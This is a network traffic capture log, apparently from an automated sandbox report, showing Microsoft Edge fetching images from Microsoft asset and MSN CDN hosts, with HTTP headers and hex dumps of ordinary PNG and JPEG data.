2024-11-10 03:55:24 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	543	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: bc3bfee2-301e-0020-3f6c-3204cb000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035524Z-15869dbbcc6tfpj2hC1DFW384c00000005sg00000000hqny Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49842	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	634	OUT	GET /tenant/amp/entityid/BB1msDML.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Mon, 21 Oct 2024 13:29:56 GMT X-Datacenter: northeu X-ActivityId: b67b5744-1fdc-4b6a-947b-ca499d40f4b8 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msDML X-Source-Length: 86931 Content-Length: 86931 Cache-Control: public, max-age=293803 Expires: Wed, 13 Nov 2024 13:32:07 GMT Date: Sun, 10 Nov 2024 03:55:24 GMT Connection: close
2024-11-10 03:55:24 UTC	15864	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-10 03:55:24 UTC	16384	IN	Data Raw: ad aa 22 99 f9 6b 19 8e 77 33 6f 51 d3 7b 52 bb 5c f6 1a ae 74 35 d8 43 c0 24 41 d4 13 73 6c 8c cc 2f 4d d1 f5 fd 4d 50 7b cd a2 db d8 e2 20 e1 1a c8 b8 91 68 e6 be 44 f7 f7 5e 26 24 72 f7 ec 5f 50 a2 05 5a 67 0b b2 64 43 da e2 08 1b c2 d3 a5 b5 4f cd 78 45 c7 3f ca bf b9 78 63 1f 24 cc 4f 2e dc 6f fb 3d 47 ee 31 59 98 4c 6a 66 47 95 84 ac 7e b7 af a9 d2 d3 73 81 6e eb 9a 0e 21 91 8c 94 a8 b1 ad 30 64 98 33 bd 61 c8 95 e5 fd b0 e6 d1 a6 69 10 48 aa 06 fe 42 0c c5 ef 7b dd 70 78 f2 cf 3f 24 45 cf 7f c9 d9 9e 38 61 86 53 51 b4 08 67 fe a4 13 15 28 cf 22 c7 41 3f e1 74 81 6f e2 5e 8a 8f b6 3a 2a c7 0f 70 b1 dc 9c d3 f7 12 17 c4 19 f1 0b da 5b 7e 56 5e 8a 83 5a de bb a7 68 3f ad d2 fe 77 b1 1b 32 5e d6 78 63 1d 7b 4c fd 9e 3e 13 33 d3 bc 47 dd f6 b6 96 d4 68 Data Ascii: "kw3oQ{R\t5C$Asl/MMP{ hD^&$r_PZgdCOxE?xc$O.o=G1YLjfG~sn!0d3aiHB{px?$E8aSQg("A?to^:*p[~V^Zh?w2^xc{L>3Gh
2024-11-10 03:55:24 UTC	1747	IN	Data Raw: 8e 05 67 96 31 94 54 c3 4c 73 9c 66 e2 68 5d 46 00 03 80 c6 48 69 27 2b 7e 91 cb 8a f2 3e d0 79 73 c3 03 4c 86 cc 8b 83 9d c0 d2 01 d5 7a 2a cf 34 e9 3d c6 74 c2 0e 86 4e 97 17 e2 bc b8 7f 78 be a3 ea 9a 75 1a 0e 11 1f 19 68 82 d9 ca da 6b c5 65 3b 45 1c cd cf 46 28 6e 26 98 8d d3 61 a3 b3 fa 2d fa d5 1b 5b a5 a4 4f f6 94 06 03 1f a9 84 cb 49 3c db 70 b2 dc f0 34 6b 65 e0 58 0f 3b 48 91 e2 a4 29 e3 a2 5d 2d 02 6c 26 e2 73 d8 38 2c 27 91 dc c5 c7 58 dd 5d ca ac 6b a3 47 80 cd 01 b1 20 d8 99 83 23 28 52 2c ab d4 b3 f4 83 49 82 d2 05 9b ef 8f 32 ab 0c 16 b6 c4 5e fc ac 94 25 ae 76 b8 70 81 33 96 5b 51 12 ce e4 b3 45 ed 8d eb 96 cb bf 85 a7 6e b6 bd 97 b0 a0 fa 6e a6 30 0b 09 03 15 c9 00 eb 99 13 c5 79 ba 1d 3b ab e2 38 9a 19 4c 09 71 70 6c 65 00 bb dc b6 1a Data Ascii: g1TLsfh]FHi'+~>ysLz*4=tNxuhke;EF(n&a-[OI<p4keX;H)]-l&s8,'X]kG #(R,I2^%vp3[QEnn0y;8Lqple
2024-11-10 03:55:25 UTC	16384	IN	Data Raw: 72 b2 ac 70 9c 8b 29 88 de ef f1 d9 ed e9 50 a0 c0 e2 61 87 f8 88 1e 1a 22 31 35 8d 3b cc f2 9f f2 5f 1f ac ea d4 9e 03 2a 3c 92 05 c3 89 12 7f 4d ac 48 f1 5a 1f bc ab 4a a9 c5 55 ce c0 cb 4f ea 23 97 2d ed 38 05 d1 3f c7 99 ff 00 75 b1 8f 34 47 78 ad fe 8f a4 8a a6 c0 16 93 a7 c4 2d c2 fa a1 cd 37 bd ae 71 0d bc ea d1 a7 85 97 82 a7 ed 4a c2 a7 f6 b2 c3 04 df 08 16 d2 e0 95 ed 99 ed 70 c2 de e3 66 5a 30 b4 16 92 67 f5 11 fa 5b 1c f5 53 3e 09 c6 95 1e 58 ca c9 6d 06 88 0e 02 1d a4 d8 ff 00 e6 4e 14 62 c2 a6 01 ac 62 10 23 33 bd 11 b5 05 5f db 46 a3 e2 83 44 5c cb a7 94 81 02 22 40 28 76 fb 5a ab 1e 59 14 b7 cc c8 69 90 de 62 64 17 70 8f 44 be 3c ed 7a f1 a6 97 51 4f b6 d1 86 a5 1a af 3a 0a 6d 93 e2 db 78 ad 3e 96 95 7e 94 12 e0 00 76 a5 a6 5c 00 bc 61 3e Data Ascii: rp)Pa"15;_*<MHZJUO#-8?u4Gx-7qJpfZ0g[S>XmNbb#3_FD\"@(vZYibdpD<zQO:mx>~v\a>
2024-11-10 03:55:25 UTC	16384	IN	Data Raw: ab 88 4c 21 08 77 04 64 49 54 19 88 c6 a8 04 b1 18 bb 01 07 8a 61 69 1f e4 a4 d2 08 9e 8e 1a e7 bd dc a0 71 25 0a 25 fa 0b 66 79 22 f0 c0 00 42 53 bc 51 c6 d3 66 d5 a8 1d 26 e2 79 2c d6 c3 9f c3 ec 8a c2 62 f7 29 10 ae 22 99 ce e6 90 d1 97 90 59 c6 4d 53 3e 08 bc d2 70 cb a5 52 47 e0 b0 13 aa 7b 80 c1 96 57 84 13 4b ac 26 fa ca 3a 88 15 0c 38 d8 72 cf 82 99 d9 a4 6f 2b e9 ab b2 88 70 73 a0 16 91 27 3e 1e 0b 2a ab 8b fc 89 8f 34 7d 6e 95 92 4e 2c 52 67 2b 7a ac 97 34 b7 4b 64 a6 2b ba f2 99 88 d3 3c 97 4d d8 46 72 99 73 ac f9 28 02 a7 2e 00 ab 64 e2 cf 5e 69 a2 8b 9d 61 03 8f 35 dd c2 5e 09 8b 08 13 a6 8b 47 a7 78 35 04 da 01 8c c4 c7 cc 28 9d a1 a6 31 13 2a 7d 16 50 bb 88 79 d0 34 58 0d bf 44 75 26 cb 1b 51 e0 00 6f 03 86 64 7d 82 cd a9 84 93 a9 13 ae 67 Data Ascii: L!wdITaiq%%fy"BSQf&y,b)"YMS>pRG{WK&:8ro+ps'>4}nN,Rg+z4Kd+<MFrs(.d^ia5^Gx5(1}Py4XDu&Qod}g
2024-11-10 03:55:25 UTC	7952	IN	Data Raw: a6 60 32 a7 3d c3 ea 7e a8 7c c6 cd 73 4e d2 79 10 3d 0a 62 19 6a d5 91 05 41 52 92 53 09 73 c1 30 5e 53 4a 7a 2e 11 ca ea b6 a8 5e 61 23 68 49 c3 f4 41 df 52 9d 30 dc d0 63 e6 50 42 c9 90 85 b1 4c 71 d1 25 04 62 ab ca a9 e0 a9 30 66 b0 99 29 59 66 a8 a0 27 2a 22 c5 45 76 68 07 93 f0 7c e6 ba 25 87 fd d3 f7 51 02 cd d9 ef 55 3b a7 6a 64 91 74 c7 2c 87 cf 35 64 e4 96 3d de f5 77 e4 90 41 12 4e 51 68 41 94 58 71 00 70 08 35 11 10 67 12 5b b5 4d 82 73 e3 c1 0e e1 05 04 90 54 35 2a db 9e c5 11 aa 0c 45 33 a8 f5 56 eb 68 52 9b aa b3 21 04 b6 eb e6 8a f2 f0 41 0d 6c 8c 87 0d 3c 10 45 54 b2 53 33 d8 99 50 5b 42 12 c5 93 06 a8 6a e5 31 3f 3f 8a 54 dc ca 01 b8 9c d7 0f 7a 8b cd 85 bc fd cb b4 5c f3 22 67 c9 01 cd cb de aa 77 8a e6 aa 77 c4 80 a4 c9 d3 ee 95 7d aa Data Ascii: `2=~\|sNy=bjARSs0^SJz.^a#hIAR0cPBLq%b0f)Yf'"Evh\|%QU;jdt,5d=wANQhAXqp5g[MsT5E3VhR!Al<ETS3P[Bj1??Tz\"gww}
2024-11-10 03:55:25 UTC	12216	IN	Data Raw: 71 09 0f c6 4d a6 3f de 7e 89 fc 70 9f 96 5e e9 bd 4b bf d5 1e 09 ce ea f0 8b d4 1e 6d fc 4a f9 e8 91 f8 c7 d6 54 1d 58 0f d4 06 c6 4f dd 2f 8e 15 f2 cb df fe fe ff 00 da 7f db f8 26 fe f6 74 78 f3 20 7b d7 ce 45 4a 45 c3 13 c9 da 07 b9 4d ce a3 7b 8f 07 7d 53 f8 f1 29 f2 e4 fa 10 ea 9e 35 ac dd 92 3e a5 5f ef 8f fa a0 7f 88 7d 17 ce 5b 07 42 d3 b5 51 24 66 d3 c2 df f5 2b f8 e1 9f cb 2f a2 3b af 04 7f 6a df e6 3f 45 11 d6 da f5 5b e6 e5 f3 63 55 bc 80 f3 8f 71 51 35 5b 17 71 fe 6f c1 2f 8f 13 f9 72 7d 30 f5 cc 1f f2 0f 27 7e 08 7f de b0 e9 50 7f 30 fa 2f 9c 8a f4 ef 67 1f 32 a1 df 6f 27 fc f9 2a d1 08 f9 32 7d 23 f7 61 c2 d5 40 f3 1f 45 7f b8 1f ea 03 c6 fe e6 af 9b 97 b5 c3 e0 70 f3 5d 89 b1 67 10 55 69 84 eb 97 d3 85 77 45 aa 37 f9 a0 fa 85 13 59 c7 fe Data Ascii: qM?~p^KmJTXO/&tx {EJEM{}S)5>_}[BQ$f+/;j?E[cUqQ5[qo/r}0'~P0/g2o'*2}#a@Ep]gUiwE7Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49843	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	634	OUT	GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	516	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL Last-Modified: Sat, 02 Nov 2024 16:15:34 GMT X-Source-Length: 1658 X-Datacenter: eastus X-ActivityId: ea0e57a3-5607-4c33-987a-1fb59e967af8 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 1658 Cache-Control: public, max-age=174113 Expires: Tue, 12 Nov 2024 04:17:17 GMT Date: Sun, 10 Nov 2024 03:55:24 GMT Connection: close
2024-11-10 03:55:24 UTC	1658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 06 2f 49 44 41 54 58 c3 d5 57 7d 6c 14 45 14 7f 33 b3 bb 77 d7 2b a5 e5 a3 48 a9 7c c4 10 82 44 12 25 d8 18 4d 8a 5a 35 11 49 0d d2 26 fc 51 03 c6 04 c3 57 03 25 a0 50 b0 11 21 d4 a4 26 02 51 f0 0b 22 06 12 30 a6 84 18 48 8a 5a 08 22 88 c4 80 80 f6 0f 3e 5a 01 11 90 c2 41 da bb 9d dd 19 df cc ee 6d f7 bc 83 16 89 31 ee e5 dd 9b 9d db 9d df ef fd de bc b7 7b 00 ff f1 41 ee f6 86 8d 0d 17 f3 be ed 3c bf 2d 61 d1 32 37 6a 15 09 d3 e0 c4 20 27 a4 41 b7 44 fb f7 db b4 6b 56 49 d7 bf 42 a0 a1 41 d2 a1 a2 e3 a5 7d 7f b6 6f 3a 2f ec b8 99 df 1f 68 3c 0f 88 45 01 0c 0a 04 4d 32 72 81 30 da 50 50 3c 6a d3 8e Data Ascii: PNGIHDR szzbKGD/IDATXW}lE3w+H\|D%MZ5I&QW%P!&Q"0HZ">ZAm1{A<-a27j 'ADkVIBA}o:/h<EM2r0PP<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49841	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	633	OUT	GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	515	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Thu, 07 Nov 2024 01:23:41 GMT X-Datacenter: westus X-ActivityId: cb9d20a8-82b1-470d-88fb-3c77bc0a45db Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AAc9vHK X-Source-Length: 1218 Content-Length: 1218 Cache-Control: public, max-age=163635 Expires: Tue, 12 Nov 2024 01:22:39 GMT Date: Sun, 10 Nov 2024 03:55:24 GMT Connection: close
2024-11-10 03:55:24 UTC	1218	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 71 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 31 34 20 37 39 2e 31 35 31 34 38 31 2c 20 32 30 31 33 2f 30 33 2f 31 33 2d 31 32 3a 30 39 3a 31 35 20 20 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<qiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49844	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	634	OUT	GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Thu, 07 Nov 2024 08:30:46 GMT X-Datacenter: eastus X-ActivityId: 8762f57e-2912-4820-afa3-621ee25c5cb5 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1lFz6G X-Source-Length: 5699 Content-Length: 5699 Cache-Control: public, max-age=189256 Expires: Tue, 12 Nov 2024 08:29:40 GMT Date: Sun, 10 Nov 2024 03:55:24 GMT Connection: close
2024-11-10 03:55:24 UTC	5699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 84 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 05 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 4a 01 1b 00 05 00 00 00 01 00 00 00 52 01 28 00 03 00 00 00 01 00 02 00 00 87 69 00 04 00 00 00 01 00 00 00 5a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 00 32 a0 03 00 04 00 00 00 01 00 00 00 32 00 00 00 00 86 f1 c2 a8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 Data Ascii: PNGIHDR22?gAMAa cHRMz&u0`:pQ<eXIfMM*JR(iZHH22pHYs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49846	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	634	OUT	GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	516	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sat, 26 Oct 2024 13:08:49 GMT X-Datacenter: westus X-ActivityId: f9118471-d63a-4ae1-a8c4-33a84d8a076d Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/png Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1hk7Sh X-Source-Length: 6962 Content-Length: 6962 Cache-Control: public, max-age=335585 Expires: Thu, 14 Nov 2024 01:08:29 GMT Date: Sun, 10 Nov 2024 03:55:24 GMT Connection: close
2024-11-10 03:55:24 UTC	6962	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 0c 3f 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 84 12 40 40 4a e8 4d 10 a9 01 a4 84 d0 42 ef 08 36 42 12 20 94 18 03 41 c5 8e 2e 2a b8 76 b1 80 0d 5d 15 51 b0 02 62 47 ec 2c 8a bd 2f 16 54 94 75 b1 60 57 de a4 80 ae fb ca f7 e6 fb e6 ce 7f ff 39 f3 9f 33 e7 ce dc 7b 07 00 8d e3 3c 89 24 0f d5 04 20 5f 5c 28 8d 0f 0d 64 8e 4a 4d 63 92 9e 02 0c d0 01 15 38 01 4b 1e bf 40 c2 8e 8d 8d 04 b0 0c b4 7f 2f ef ae 03 44 de 5e 71 94 6b fd b3 ff bf 16 2d 81 b0 80 0f 00 12 0b 71 86 a0 80 9f 0f f1 7e 00 f0 2a be 44 5a 08 00 51 ce 5b 4c 2a 94 c8 31 ac 40 47 0a 03 84 78 be 1c 67 29 71 95 1c 67 28 f1 6e 85 4d 62 3c 07 Data Ascii: PNGIHDR22??iCCPICC ProfileHWXS[@@JMB6B A.v]QbG,/Tu`W93{<$ _\(dJMc8K@/D^qk-q~DZQ[L*1@Gxg)qg(nMb<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49845	23.192.223.200	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	634	OUT	GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	517	IN	HTTP/1.1 200 OK Content-Type: image/png Access-Control-Allow-Origin: * Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1t99ka Last-Modified: Fri, 01 Nov 2024 18:01:15 GMT X-Source-Length: 20811 X-Datacenter: eastus X-ActivityId: f7ec68f9-61c4-4117-9b16-c229b5f431dd Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Length: 20811 Cache-Control: public, max-age=94156 Expires: Mon, 11 Nov 2024 06:04:40 GMT Date: Sun, 10 Nov 2024 03:55:24 GMT Connection: close
2024-11-10 03:55:24 UTC	15867	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 02 00 00 00 0f dd a1 9b 00 00 0c 3e 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 10 20 80 80 94 d0 9b 20 22 25 80 94 10 5a 00 e9 45 b0 11 92 00 a1 c4 18 08 2a 76 74 51 c1 b5 8b 08 d8 d0 55 11 c5 0e 88 1d b1 b3 28 f6 be 58 50 50 d6 c5 82 5d 79 93 02 ba ee 2b df 9b 7c 33 f3 e7 9f 33 ff 39 73 ee dc 32 00 d0 4f f0 24 92 1c 54 13 80 5c 71 be 34 36 24 80 39 26 39 85 49 ea 02 28 a0 c2 df 50 40 e7 f1 f3 24 ec e8 e8 08 00 cb 40 ff f7 f2 ee 06 40 e4 fd 55 47 b9 d6 3f c7 ff 6b d1 12 08 f3 f8 00 20 d1 10 a7 09 f2 f8 b9 10 1f 00 00 af e2 4b a4 f9 00 10 e5 bc c5 94 7c 89 1c c3 0a 74 a4 30 40 88 17 ca 71 86 12 57 c9 71 9a 12 ef 51 d8 c4 c7 72 20 6e Data Ascii: PNGIHDR>iCCPICC ProfileHWXS[ "%ZE*vtQU(XPP]y+\|339s2O$T\q46$9&9I(P@$@@UG?k K\|t0@qWqQr n
